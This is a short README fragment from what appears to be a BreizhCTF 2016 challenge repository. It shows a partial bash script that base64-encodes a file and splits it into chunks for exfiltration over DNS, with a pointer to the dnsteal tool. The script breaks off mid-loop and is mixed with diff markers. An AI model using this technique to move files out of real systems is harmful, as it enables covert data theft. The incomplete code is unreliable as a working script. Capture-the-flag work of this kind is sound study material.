notfound-404/BREIZHCTF2K16/DO_NOT_STRUGGLE_ME/README.md

 _noise & PID="$!"
 echo "GO DNS"
+## No need to think, take it : https://github.com/m57/dnsteal
 for r in $(for i in $(base64 -w0 $f| sed "s/.\{$b\}/&\n/g");do
     if [[ "$c" -lt "$s"  ]]; then
         echo -ne "$i-."